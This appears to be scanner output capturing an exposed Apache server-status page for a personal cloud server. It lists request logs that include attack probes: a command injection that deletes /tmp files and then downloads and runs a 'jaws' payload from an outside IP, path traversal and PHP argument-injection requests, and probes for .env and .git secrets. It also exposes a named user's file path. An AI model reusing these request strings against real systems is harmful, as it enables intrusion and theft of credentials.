7.6611389791660.00.221178.70 157.245.113.227http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-31525923550/29/6948_ 7.367433609098040.00.181538.28 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31525923550/31/7595_ 7.3501269465630.00.211702.32 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31525923550/30/6961_ 7.5411579518230.00.181289.54 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31525923550/32/8978_ 7.428857569625270.00.211498.66 172.168.41.209http/1.1 1-31525923550/40/7238_ 7.62743839378940.00.281647.88 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 1-31525923550/29/9434_ 7.010569475400.00.181822.30 184.105.139.67http/1.1 1-31525923550/39/7466_ 7.522329779257220.00.231349.85 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31525923550/36/7898_ 7.58261114609665510.00.211685.96 197.52.228.117http/1.1 1-31525923550/23/7963_ 7.317433839067180.00.161954.28 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31525923550/36/7458_ 7.63261109653520.00.234050.11 197.52.228.117http/1.1localhost:80GET /shell?cd+/tmp;rm+-rf+*;wget+82.165.221.158/jaws;sh+/tmp/ja 1-31525923550/36/7099_ 7.63261109540060.00.202085.91 197.52.228.117http/1.1localhost:80GET /shell?cd+/tmp;rm+-rf+*;wget+82.165.221.158/jaws;sh+/tmp/ja 1-31525923550/31/8839_ 7.64253519279490.00.221620.90 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-31525923550/38/6846_ 7.392530589466160.00.231153.16 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31525923550/38/7622_ 7.58261111869356380.00.261359.22 197.52.228.117http/1.1 1-31525923550/30/7730_ 7.6521389610850.00.181838.73 157.245.113.227http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31525923550/33/6746_ 7.6801659098260.00.212000.44 157.245.113.227http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-31525923550/34/7184_ 7.522329659074360.00.222343.73 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-31525923550/35/6840_ 7.66115212120380.00.191957.59 157.245.113.227http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-31525923550/27/7806_ 7.2426092869241880.00.491899.22 197.52.228.117http/1.1 1-31525923550/27/6888_ 7.382611639524610.00.193151.87 197.52.228.117http/1.1 1-31525923550/31/7092_ 7.64233409498990.00.183639.55 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-31525923550/31/7020_ 7.0525301229596310.00.201233.64 185.117.37.101http/1.1ravignon.mycloud.paris:443GET
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805ac84d8bd
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 30-Sep-2024 14:32:22 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 314 Parent Server MPM Generation: 313 Server uptime: 311 days 7 hours 32 minutes 43 seconds Server load: 0.02 0.04 0.01 Total accesses: 541966 - Total Traffic: 59.4 GB - Total Duration: 77009690 CPU Usage: u902.12 s1752.52 cu5740.22 cs1598.85 - .0372% CPU load .0201 requests/sec - 2371 B/second - 114.9 kB/request - 142.093 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12583938no0yes124000 32583939no0yes025000 Sum200 149000 ........................._____W___________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0039793918797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0039793918124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.003979391278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0039793908439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.003979392428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.003979392208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.003979391318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.003979391848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.003979391338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.003979391448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0039793918393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.003979392698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0039793918811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.003979392278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0039793958636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0039793909103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0039793918748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0039793908549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.003979391448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0039793918758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0039793918268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0039793938632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0039793918208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0039793938638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.003979391658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31325839380/25/8021_ 5.65109398780.00.061825.02 207.154.197.113h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31325839380/19/7930_ 5.58109649820.00.081178.26 207.154.197.113h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31325839380/23/6882_ 5.69108993450.00.021537.89 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31325839380/25/7516_ 5.38119358810.00.021701.86 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-31325839380/24/6895_ 5.37209414640.00.051289.17 207.154.197.113http/1.1 1-31325839381/26/8913W 4.76009525400.00.031498.29 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-31325839380/23/7159_ 5.7911009257980.00.051647.37 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-31325839380/17/9369_ 5.57219364540.00.041821.95 207.154.197.113http/1.1 1-31325839380/23/7391_ 5.48219133120.00.031349.44 207.154.197.113http/1.1 1-31325839380/25/7827_ 5.781929532940.00.051685.54 207.154.197.113http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-31325839380/26/7904_ 5.5111618975270.00.061953.92 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-31325839380/23/7375_ 5.64019528980.00.034049.60 207.154.197.113h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31325839380/15/7032_ 5.22179417200.00.022085.50 207.154.197.113http/1.1 1-31325839380/19/8774_ 5.22109176820.00.021620.46 207.154.197.113http/1.1 1-31325839380/27/6768_ 5.8101169305890.00.031152.74 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-31325839380/24/7547_ 5.8101479163040.00.031358.74 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-31325839380/19/7660_ 5.40019540200.00.021838.38 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-31325839380/31/6674_ 5.68108982320.00.052000.03 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-31325839380/37/7104_ 5.820738945370.00.052343.21 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-31325839380/15/6764_ 5.8106411968200.00.021957.19 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-31325839380/26/7745_ 5.6401839141730.00.061898.56 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31325839380/20/6823_ 5.47009407860.00.043151.46 185.117.37.101h2ravignon.mycloud.paris:443[1/1] done: stream 1, PROPFIND /remote.php/dav/files/Beatrice%2 1-31325839380/20/7018_ 5.791639370030.00.063639.18 207.154.197.113http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31325839380/31/6955_ 5.8101049458750.00.061233.24 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-3132583938
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48056d729846
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 28-Sep-2024 18:25:49 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 312 Parent Server MPM Generation: 311 Server uptime: 309 days 11 hours 26 minutes 9 seconds Server load: 0.15 0.03 0.01 Total accesses: 539100 - Total Traffic: 59.4 GB - Total Duration: 76984510 CPU Usage: u886.2 s1736.84 cu5732.5 cs1596.59 - .0372% CPU load .0202 requests/sec - 2384 B/second - 115.5 kB/request - 142.802 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12575514no0yes025000 32575515no0yes124000 Sum200 149000 ........................._________________________.............. ...........___________________W_____............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0023914518797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0023914518124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.002391451278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0023914508439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.002391452428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.002391452208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.002391451318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.002391451848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.002391451338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.002391451448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0023914518393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.002391452698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0023914518811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.002391452278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0023914558636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0023914509103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0023914518748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0023914508549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.002391451448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0023914518758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0023914518268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0023914538632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0023914518208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0023914538638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.002391451658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31125755140/8/7987_ 3.2122421249398630.00.071824.91 170.64.139.79http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-31125755140/6/7903_ 3.06255919645720.00.041178.12 162.142.125.215http/1.1 1-31125755140/5/6852_ 3.0925591378992150.00.061537.84 207.180.219.138http/1.1ravignon.mycloud.paris:443GET /_static/.env HTTP/1.1 1-31125755140/5/7484_ 3.0626811629358780.00.091701.82 54.37.79.75http/1.1 1-31125755140/5/6862_ 3.0925591169410850.00.071289.08 207.180.219.138http/1.1ravignon.mycloud.paris:443GET /.docker/.env HTTP/1.1 1-31125755140/4/8877_ 3.28255909520610.00.041498.19 162.142.125.215http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-31125755140/4/7129_ 3.116096629253830.00.041647.27 207.180.219.138http/1.1ravignon.mycloud.paris:443GET /product/.env.staging HTTP/1.1 1-31125755140/7/9344_ 3.2360921279359620.00.051821.85 47.251.104.144http/1.1ravignon.mycloud.paris:443POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 1-31125755140/5/7361_ 3.126089719131080.00.041349.37 207.180.219.138http/1.1ravignon.mycloud.paris:443POST /product/.env.staging HTTP/1.1 1-31125755140/4/7790_ 3.2550952709528010.00.041685.40 94.159.113.15http/1.1ravignon.mycloud.paris:443GET /vpn/index.html HTTP/1.1 1-31125755140/7/7872_ 3.22208008973630.02.991953.83 47.251.104.144http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-31125755140/6/7345_ 3.28268119526230.00.044049.52 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-31125755140/8/7009_ 3.28268109412370.00.042085.42 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-31125755140/7/8745_ 3.052681569176760.00.031620.43 54.37.79.75http/1.1 1-31125755140/7/6732_ 3.0538811159300230.00.061152.63 207.180.219.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31125755140/5/7517_ 3.28255929158610.00.081358.67 162.142.125.215http/1.1localhost:80GET / HTTP/1.1 1-31125755140/7/7631_ 3.04420019537350.00.021838.31 207.180.219.138http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31125755140/5/6634_ 3.25420008976330.00.061999.95 152.32.245.186http/1.1ravignon.mycloud.paris:443GET /robots.txt HTTP/1.1 1-31125755140/6/7058_ 3.044289588942870.00.062343.15 165.154.119.19http/1.1 1-31125755140/5/6740_ 3.202559211964670.00.051957.09 162.142.125.215h2clocalhost:80[0/0] done 1-31125755140/5/7712_ 3.3020821449139180.00.051898.46 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-31125755140/7/6796_ 3.1925591569406930.00.053151.41 162.142.125.215h2clocalhost:80[0/0] init 1-31125755140/6/6990_ 3.29224709366580.00.073639.06 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-31125755140/7/6918_ 3.125095589452010.02.981233.15 207.180.219.138http/1.1ravignon.mycloud.paris:443POST /laravel/.env HTTP/1.1 1-31125755140/5/6735_ 3.2738822319173960.00.051602.39 199.45.154.154ht
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48050ce4e833
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 26-Sep-2024 20:15:28 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 310 Parent Server MPM Generation: 309 Server uptime: 307 days 13 hours 15 minutes 49 seconds Server load: 0.00 0.00 0.00 Total accesses: 535536 - Total Traffic: 59.3 GB - Total Duration: 76917808 CPU Usage: u901.86 s1737.3 cu5684.56 cs1573.84 - .0372% CPU load .0202 requests/sec - 2397 B/second - 116.2 kB/request - 143.628 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12566982no0yes025000 32566983no0yes124000 Sum200 149000 ........................._________________________.............. ...........________________W________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.007292518797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.007292518124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.00729251278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.007292508439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.00729252428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.00729252208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.00729251318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.00729251848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.00729251338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.00729251448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.007292518393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.00729252698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.007292518811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.00729252278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.007292558636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.007292509103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.007292518748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.007292508549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.00729251448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.007292518758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.007292518268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.007292538632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.007292518208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.007292538638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.00729251658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-30925669820/26/7955_ 9.8417681269392350.00.051824.77 198.235.24.252http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30925669820/30/7870_ 9.23109640330.00.051177.97 157.245.36.108http/1.1 1-30925669820/26/6803_ 9.8901418986510.00.061537.45 157.245.36.108http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-30925669820/33/7448_ 9.801849351280.00.241701.67 157.245.36.108http/1.1 1-30925669820/34/6820_ 9.74628609406010.00.051288.28 185.117.37.101h2ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-30925669820/42/8838_ 9.51009515250.00.061498.08 54.37.79.75http/1.1 1-30925669820/40/7093_ 9.65742609244410.00.071647.14 54.37.79.75http/1.1 1-30925669820/41/9299_ 9.81446709350540.00.051821.65 45.148.10.242http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-30925669820/35/7328_ 9.80742629126750.00.041349.28 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-30925669820/44/7746_ 9.81391109515220.00.081685.26 51.254.59.114http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-30925669820/38/7839_ 9.41391008953330.00.081950.77 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 1-30925669820/41/7295_ 9.67446709513500.00.094049.31 45.148.10.242http/1.1 1-30925669820/28/6945_ 9.69384809405850.00.052084.24 51.254.59.114http/1.1 1-30925669820/42/8706_ 9.82371209168350.00.071620.29 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-30925669820/34/6694_ 9.61370709293100.00.031149.72 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30925669820/36/7471_ 9.34370609149540.00.041358.29 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30925669820/44/7582_ 9.71224409530580.00.061837.47 103.116.81.150http/1.1 1-30925669820/34/6597_ 9.81728708969710.00.071999.83 64.62.197.150http/1.1localhost:80GET /server-status HTTP/1.1 1-30925669820/30/7009_ 9.38728728938630.00.042342.97 64.62.197.150http/1.1 1-30925669820/28/6702_ 9.781768011957270.00.031956.95 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30925669820/37/7671_ 9.81629109131570.00.091898.34 185.224.128.59http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-30925669820/37/6752_ 9.864239401800.00.063151.03 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-30925669820/37/6952_ 9.794209353700.00.073638.82 54.37.79.75http/1.1 1-30925669820/42/6878_ 9.8812449434780.00.081230.07 157.245.36.108http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30925669820/35/6691_ 9.73109170370.00.041602.26 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 2-308-0/0/2474. 0.007292543357500.00.0025.22 </
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48054361acca
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 25-Sep-2024 02:54:07 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 309 Parent Server MPM Generation: 308 Server uptime: 305 days 19 hours 54 minutes 27 seconds Server load: 0.00 0.00 0.00 Total accesses: 528568 - Total Traffic: 59.3 GB - Total Duration: 76891521 CPU Usage: u871.86 s1715.19 cu5654.09 cs1559.83 - .0371% CPU load .02 requests/sec - 2408 B/second - 117.6 kB/request - 145.471 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02562647no0yes025000 22562648no0yes124000 Sum200 149000 _________________________.........................______________ _W_________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30825626470/6/5574_ 0.5592372068797390.00.03105.83 172.104.137.47http/1.1 0-30825626470/5/5527_ 0.45101568124280.00.0782.20 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-30825626470/1/5633_ 0.23910408563560.00.0193.88 170.64.130.197http/1.1 0-30825626470/4/5570_ 0.32923808439410.00.03101.04 172.104.137.47http/1.1 0-30825626470/5/5623_ 0.29808666910.00.02103.16 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-30825626470/6/5690_ 0.51923708719590.00.06123.35 172.104.137.47http/1.1 0-30825626470/12/5611_ 0.6875752668423810.00.0775.16 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-30825626470/1/5598_ 0.257575748428620.00.0295.81 172.104.137.47http/1.1 0-30825626470/6/5502_ 0.69574608524150.00.0289.82 65.49.1.115http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-30825626470/4/5622_ 0.54738969630.00.02171.94 146.190.103.103http/1.1 0-30825626470/9/5592_ 0.70308768393100.00.0579.26 198.235.24.232http/1.1localhost:80GET / HTTP/1.1 0-30825626470/1/5553_ 0.10308718338540.00.0070.61 198.235.24.232http/1.1 0-30825626470/8/5648_ 0.51508810780.00.0492.03 172.104.137.47http/1.1 0-30825626470/7/5603_ 0.531108689520.00.0081.80 146.190.103.103h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-30825626470/5/5659_ 0.4892361558636770.00.0956.15 172.104.137.47http/1.1ravignon.mycloud.paris:443GET /admin.cfm HTTP/1.1 0-30825626470/8/5674_ 0.7951719103570.00.0595.87 146.190.103.103http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-30825626470/2/5580_ 0.66905718748010.00.01129.08 80.82.77.202http/1.1localhost:80GET / HTTP/1.0 0-30825626470/7/5536_ 0.7662078549630.00.05116.38 146.190.103.103http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-30825626470/9/5561_ 0.52905708315150.00.0889.67 172.104.137.47http/1.1 0-30825626470/2/5492_ 0.2392382598758760.00.0288.34 172.104.137.47http/1.1 0-30825626470/5/5520_ 0.51923708268620.00.0264.61 172.104.137.47http/1.1 0-30825626470/5/5540_ 0.51910608632890.00.0167.32 170.64.130.197h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-30825626470/3/5428_ 0.46508208040.00.0075.31 172.104.137.47http/1.1 0-30825626470/4/5560_ 0.40923738638990.00.0391.69 172.104.137.47http/1.1 0-30825626470/4/5548_ 0.5957461668643320.00.02112.86 65.49.1.115http/1.1 1-306-0/0/7929. 0.009684329391050.00.001824.72 134.209.25.199http/1.1 1-306-0/0/7840. 0.009684359638640.00.001177.92 134.209.25.199http/1.1ravignon.mycloud.paris:443GET /server-status 